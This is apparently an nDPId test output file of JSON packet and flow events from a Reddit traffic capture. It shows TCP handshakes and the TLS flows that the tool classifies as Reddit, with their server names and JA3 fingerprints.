-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686071,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc+p6YTHT6uGMsoBJXgOg4AAACBAV4AQMDAwQCCArC1zipqXTl5w=="} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686071,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc+BQBJhBwR01MoBJXgDmIAAACBAV4AQMDAwQCCArC1zipqXTl5w=="} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686071,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc9o6MJX7sl7kLoBJXgNeBAAACBAV4AQMDAwQCCArC1zioqXTl5w=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686071,"pkt":"qtsDr8lk5EKm5WPyht1gB\/ybACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PoBu\/q4YyyemEx1gBAB+2wmAAABAQgKqXTmC8LXOKk="} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686071,"pkt":"qtsDr8lk5EKm5WPyht1gCVbzACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PgBu3BHTUwUASYRgBAB+711AAABAQgKqXTmC8LXOKk="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686071,"pkt":"qtsDr8lk5EKm5WPyht1gAChDACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PYBu+yXuQuOjCV\/gBAB+1tvAAABAQgKqXTmC8LXOKg="} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1605291686072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686072,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc\/KfiS\/LFklWsoBJXgCIUAAACBAV4AQMDAwQCCArC1ziqqXTl5w=="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1605291686072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686072,"pkt":"qtsDr8lk5EKm5WPyht1gAreKACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PwBu8WSVayn4kvzgBAB+6YAAAABAQgKqXTmDMLXOKo="} -00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686072,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":443,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686084,"flow_last_seen":1605291686084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686084,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1605291686084,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686084,"pkt":"qtsDr8lk5EKm5WPyht1gBTHMACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3Q4Bu5RtgHMAAAAAoAL9IHHJAAACBAWgBAIICql05hgAAAAAAQMDBw=="} -00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686084,"flow_last_seen":1605291686084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686084,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1605291686084,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686084,"pkt":"qtsDr8lk5EKm5WPyht1gCcfOACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RABu9uJgbEAAAAAoAL9ICltAAACBAWgBAIICql05hgAAAAAAQMDBw=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686099,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdAmJL0EwGjpsfoBJXgFyoAAACBAV4AQMDAwQCCArC1zjFqXTmAA=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686099,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdABmbR4V8rX10oBJXgNWtAAACBAV4AQMDAwQCCArC1zjFqXTmAA=="} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686099,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc\/oyw49PvcdTXoBJXgPwjAAACBAV4AQMDAwQCCArC1zjFqXTmAA=="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686099,"pkt":"qtsDr8lk5EKm5WPyht1gBLbYACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QIBuwaOmx9iS9BNgBAB++CSAAABAQgKqXTmJ8LXOMU="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686099,"pkt":"qtsDr8lk5EKm5WPyht1gDoxGACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QABu3ytfXQZm0eGgBAB+1mYAAABAQgKqXTmJ8LXOMU="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686099,"pkt":"qtsDr8lk5EKm5WPyht1gBKPwACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3P4Bu+9x1NeMsOPUgBAB+4AOAAABAQgKqXTmJ8LXOMU="} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdBugO8IeJd6tioBJXgCN0AAACBAV4AQMDAwQCCArC1zjGqXTmBA=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdBGVsk6UAYN+NoBJXgFfrAAACBAV4AQMDAwQCCArC1zjGqXTmAA=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdCGPwRcUBxWYioBJXgB9GAAACBAV4AQMDAwQCCArC1zjGqXTmBA=="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686100,"pkt":"qtsDr8lk5EKm5WPyht1gBAJCACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QYBu4l3q2LoDvCIgBAB+6dhAAABAQgKqXTmKMLXOMY="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686100,"pkt":"qtsDr8lk5EKm5WPyht1gCVnRACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QQBuwBg341lbJOmgBAB+9vUAAABAQgKqXTmKMLXOMY="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686100,"pkt":"qtsDr8lk5EKm5WPyht1gAj4aACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QgBuwHFZiJj8EXGgBAB+6MzAAABAQgKqXTmKMLXOMY="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdCnzgy8YZci18oBJXgKFLAAACBAV4AQMDAwQCCArC1zjGqXTmBA=="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686100,"pkt":"qtsDr8lk5EKm5WPyht1gCQMdACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QoBuxlyLXx84MvHgBAB+yU5AAABAQgKqXTmKMLXOMY="} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686101,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686101,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1605291686102,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686102,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdDA6Vo\/hs46MGoBJXgG5nAAACBAV4AQMDAwQCCArC1zjGqXTmBA=="} 